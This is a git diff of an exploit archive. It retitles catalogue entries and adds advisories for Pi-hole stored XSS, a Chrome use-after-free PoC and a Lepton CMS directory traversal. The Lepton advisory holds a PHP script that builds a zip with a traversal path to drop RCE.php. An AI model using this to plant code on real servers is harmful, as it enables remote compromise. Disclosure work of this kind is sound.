diff --git a/files.csv b/files.csv index acfa9fa77..046e7b2c4 100755 --- a/files.csv +++ b/files.csv @@ -1575,20 +1575,20 @@ id,file,description,date,author,platform,type,port 1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 1866,platforms/php/webapps/1866.txt,"PHP-Nuke 7.9 Final (phpbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0 -1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0 +1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service",2006-06-02,n00b,multiple,dos,0 1868,platforms/php/webapps/1868.php,"Pixelpost 1-5rc1-2 - Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0 1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - (catid) SQL Injection",2006-06-03,FarhadKey,asp,webapps,0 -1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit",2006-06-03,rgod,php,webapps,0 +1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - Multiple Vulnerabilities",2006-06-03,rgod,php,webapps,0 1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0 1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0 1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0 1878,platforms/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps,0 1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 -1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit",2006-06-05,"ECL Labs",linux,dos,0 +1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0 1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a (edit.php) Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 @@ -1598,13 +1598,13 @@ id,file,description,date,author,platform,type,port 1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - (post.php) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - (jpcache.php) Remote Include",2006-06-08,"Federico Fazzi",php,webapps,0 1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0 -1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 -1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote Include",2006-06-08,Kacper,php,webapps,0 +1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 +1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion",2006-06-08,Kacper,php,webapps,0 1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0 1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 -1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0 -1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote Include",2006-06-10,Kacper,php,webapps,0 -1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote Include",2006-06-10,Kacper,php,webapps,0 +1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC",2006-06-09,"Federico Fazzi",linux,dos,0 +1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 +1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 1897,platforms/php/webapps/1897.txt,"phpOnDirectory 1.0 - Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 1898,platforms/php/webapps/1898.txt,"WebprojectDB 0.1.3 - (INCDIR) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - (qb_path) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 @@ -1644,8 +1644,8 @@ id,file,description,date,author,platform,type,port 1933,platforms/php/webapps/1933.txt,"BandSite CMS 1.1.1 - (root_path) Remote File Inclusion",2006-06-20,Kw3[R]Ln,php,webapps,0 1934,platforms/php/webapps/1934.txt,"dotProject 2.0.3 - (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0 1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0 -1936,platforms/php/webapps/1936.txt,"SmartSiteCMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0 -1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0 +1936,platforms/php/webapps/1936.txt,"SmartSite CMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0 +1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0 1938,platforms/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0 1939,platforms/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0 1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445 @@ -1653,9 +1653,9 @@ id,file,description,date,author,platform,type,port 1942,platforms/php/webapps/1942.txt,"ralf image gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,php,webapps,0 1944,platforms/windows/local/1944.c,"Microsoft Excel Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0 -1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit",2006-06-22,the_day,php,webapps,0 +1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion",2006-06-22,the_day,php,webapps,0 1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection Exploit",2006-06-23,rgod,php,webapps,0 -1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final do_hook() Remote Denial of Service Exploit",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 +1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - (ROOT_PATH) Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow PoC",2006-06-24,"Jerome Athias",windows,dos,0 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 @@ -1668,7 +1668,7 @@ id,file,description,date,author,platform,type,port 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection Exploit",2006-06-27,simo64,php,webapps,0 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit",2006-06-27,FistFuXXer,windows,local,0 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0 -1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k SQL Injection Exploit",2006-06-28,rgod,php,webapps,0 +1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0 1962,platforms/osx/local/1962.pl,"Mac OS X 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 @@ -3739,7 +3739,7 @@ id,file,description,date,author,platform,type,port 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0 4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0 4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0 -4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 +4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 4092,platforms/php/webapps/4092.txt,"netclassifieds - (SQL/XSS/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow Exploit",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow Exploit",2007-06-22,callAX,windows,remote,0 @@ -7528,7 +7528,7 @@ id,file,description,date,author,platform,type,port 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 -8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0 +8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0 8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Auth Bypass/LFI/RCE) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0 @@ -12348,7 +12348,7 @@ id,file,description,date,author,platform,type,port 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0 14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0 14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0 -14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0 +14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0 14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - LFI",2010-06-24,MISTERFRIBO,php,webapps,0 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL injection",2010-06-24,Sangteamtham,php,webapps,0 @@ -20898,8 +20898,8 @@ id,file,description,date,author,platform,type,port 23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0 23681,platforms/windows/dos/23681.pl,"EvolutionX Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0 23682,platforms/linux/local/23682.c,"XFree86 4.3 Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0 -23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 -23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 +23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 +23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0 23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 @@ -22367,7 +22367,7 @@ id,file,description,date,author,platform,type,port 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 -25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 +25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 @@ -22384,7 +22384,7 @@ id,file,description,date,author,platform,type,port 25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0 25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.php HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0 -25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0 +25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0 25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0 25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - CSRF Add Admin Exploit",2013-05-06,Fallaga,php,webapps,0 25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0 @@ -22401,7 +22401,7 @@ id,file,description,date,author,platform,type,port 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0 25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - index.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 -25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 +25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 25262,platforms/php/webapps/25262.txt,"InterSpire ArticleLive 2005 NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0 25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 msg.php XSS",2005-03-23,"benji lemien",php,webapps,0 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 membres.php mt Parameter XSS",2005-03-23,"benji lemien",php,webapps,0 @@ -27370,7 +27370,7 @@ id,file,description,date,author,platform,type,port 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0 30478,platforms/php/webapps/30478.txt,"php MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,"cr4wl3r ",php,webapps,80 -30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - Index.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 @@ -33637,7 +33637,7 @@ id,file,description,date,author,platform,type,port 37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 -37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 +37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 @@ -36386,9 +36386,19 @@ id,file,description,date,author,platform,type,port 40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80 -40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x_ 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0 -40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013_2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0 +40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x / 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0 +40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0 40239,platforms/jsp/webapps/40239.txt,"WSO2 Identity Server 5.1.0 - Multiple Vulnerabilities",2016-08-16,hyp3rlinx,jsp,webapps,0 40240,platforms/jsp/webapps/40240.txt,"WSO2 Carbon 4.4.5 - Local File Inclusion",2016-08-16,hyp3rlinx,jsp,webapps,9443 40241,platforms/jsp/webapps/40241.txt,"WSO2 Carbon 4.4.5 - Stored XSS",2016-08-16,hyp3rlinx,jsp,webapps,9443 40242,platforms/jsp/webapps/40242.txt,"WSO2 Carbon 4.4.5 - (Denial of Service) CSRF",2016-08-16,hyp3rlinx,jsp,webapps,9443 +40243,platforms/osx/dos/40243.html,"Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC",2013-04-04,"Google Security Research",osx,dos,0 +40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 +40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 +40247,platforms/php/webapps/40247.txt,"Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal",2016-08-16,hyp3rlinx,php,webapps,80 +40248,platforms/php/webapps/40248.txt,"Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection",2016-08-16,hyp3rlinx,php,webapps,80 +40249,platforms/linux/webapps/40249.txt,"Pi-Hole Web Interface 2.8.1 - Stored XSS in Whitelist/Blacklist",2016-08-16,loneferret,linux,webapps,0 +40250,platforms/php/webapps/40250.txt,"Nagios Log Server 1.4.1 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0 +40251,platforms/php/webapps/40251.txt,"Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0 +40252,platforms/php/webapps/40252.txt,"Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0 +40253,platforms/windows/dos/40253.html,"Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0 diff --git a/platforms/linux/webapps/40249.txt b/platforms/linux/webapps/40249.txt new file mode 100755 index 000000000..3d957dd13 --- /dev/null +++ b/platforms/linux/webapps/40249.txt @@ -0,0 +1,50 @@ +# Exploit Title: Pi-Hole Web Interface Stored XSS in White/Black list file +# Author: loneferret from Kioptrix +# Product: Pi-Hole +# Version: Web Interface 1.3 +# Web Interface software: https://github.com/pi-hole/AdminLTE +# Version: Pi-Hole v2.8.1 +# Discovery date: July 20th 2016 +# Vendor Site: https://pi-hole.net +# Software Download: https://github.com/pi-hole/pi-hole +# Tested on: Ubuntu 14.04 +# Solution: Update to next version. + +# Software description: +# The Pi-hole is an advertising-aware DNS/Web server. If an ad domain is queried, +# a small Web page or GIF is delivered in place of the advertisement. +# You can also replace ads with any image you want since it is just a simple +# Webpage taking place of the ads. + +# Note: Not much of a vulnerability, implies you already have access +# to the box to begin with. Still best to use good coding practices, +# and avoid such things. + +# Vulnerability PoC: Stored XSS +# Insert this: +# +# In either /etc/pihole/blacklist.txt || /etc/pihole/whitelist.txt +# +# Then navigate to: +# http://pi-hole-server/admin/list.php?l=white +# or +# http://pi-hole-server/admin/list.php?l=black +# +# And a pop-up will appear. + +# Disclosure timeline: +# July 20th 2016: Sent initial email to author. +# July 21st 2016: Response, bug has been forwarded to web dev people +# July 22nd 2016: Asked to be kept up to date on fix +# July 27th 2016: Author replied saying he shall +# July 28th 2016: - Today I had chocolat milk - +# August 3rd 2016: Reply saying there's a fix, waiting on "Mark" to confirm +# August 3rd 2106: Supplies URL to fix from Github https://github.com/pi-hole/AdminLTE/pull/120 +# August 4th 2016: Thanked him for fix, informed him of a lame LFI in the web interface as well. +# August 4th 2016: - While drinking my coffee, I realize my comments are longer than the actual PoC. - +# August 10th 2016: Still nothing +# August 12th 2016: Submitting this is taking too much time to integrate their fix + +-- +Notice: This email does not mean I'm consenting to receiving promotional +emails/spam/etc. Remember Canada has laws. diff --git a/platforms/osx/dos/40243.html b/platforms/osx/dos/40243.html new file mode 100755 index 000000000..47b556da7 --- /dev/null +++ b/platforms/osx/dos/40243.html @@ -0,0 +1,104 @@ +#---object-beforeload-chrome.html---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + + + + + + + + +#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + + + + + +#---object-beforeload-frame-chrome.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + + + + + + +#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + +## E-DB Note: Source ~ https://bugs.chromium.org/p/chromium/issues/detail?id=226696 \ No newline at end of file diff --git a/platforms/php/webapps/40247.txt b/platforms/php/webapps/40247.txt new file mode 100755 index 000000000..ab6111234 --- /dev/null +++ b/platforms/php/webapps/40247.txt @@ -0,0 +1,98 @@ +[+] Credits: John Page (HYP3RLINX) + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt + +[+] ISR: ApparitionSec + + +Vendor: +================== +www.lepton-cms.org + + +Product: +================================= +Lepton CMS 2.2.0 / 2.2.1 (update) + +LEPTON is an easy-to-use but full customizable Content Management System (CMS). + + +Vulnerability Type: +============================ +Archive Directory Traversal + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +===================== + +Lepton has feature that lets users install new modules, if malicious user uploads an archive and the module is not valid it +will generate an error. However, the malicious archive will still get decompressed and no check is made for ../ characters in +the file name allowing in arbitrary PHP files to be placed outside the intended target directory for installed modules. This can +then be used to execute remote commands on the affected host system. + +e.g. + +We get error message as below. + +under "Add Ons" tab Install Module. +Invalid LEPTON installation file. Please check the *.zip format.[1] + +Archive still gets decompressed and the malicious file is moved outside of the intended target directory, by using ../ in file name. + + +Exploit code(s): +=============== + +";exit();} +$file_name=$argv[1]; + +$zip = new ZipArchive(); +$res = $zip->open("$file_name.zip", ZipArchive::CREATE); +$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", ''); +$zip->close(); + +echo "Malicious archive created...\r\n"; +echo "========= hyp3rlinx ============"; +?> + + +Disclosure Timeline: +=========================================================== +Attempted Vendor Notification: June 11, 2016 (No replies) +Vendor Notification on July 12, 2016 ( thanks Henri Salo ) +Vendor Acknowledgement: July 13, 2016 +Vendor fixes: July 14, 2016 +Vendor release version 2.2.2 : August 12, 2016 +August 15, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Local + + +Severity Level: +================ +High + + +[+] Disclaimer +The information contained within 